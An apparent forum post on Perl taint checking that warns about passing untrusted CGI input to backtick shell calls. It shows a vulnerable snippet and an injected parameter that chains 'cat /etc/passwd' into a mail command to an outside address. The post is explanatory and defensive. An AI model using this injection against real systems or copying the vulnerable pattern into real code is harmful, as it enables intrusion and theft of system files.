Bit like mounting a paper shreader in your letterbox as defence against junk mail! system and eval calls are some of the more obvious places that tainted or untrustworthy data can cause havoc. For example, if you were blindly running

my $cmd = '/usr/bin/file ' . $q->param('object');
my $mimetype = `$cmd`;
[download]

To check the mime type of a given object, of course some clown could then supply the object param as /my/dummy/object; cat /etc/passwd | mail crakd@your.boxen.com Which would probably not give your script too much trouble, but possibly email /etc/passwd to somewhere it should not be.

Writing to a database without untainting input can also create grief, try removing an LDAP entry that has an equals sign '=' as the first character of it's CN "accidentally" inserted

I can't believe it's not psellchecked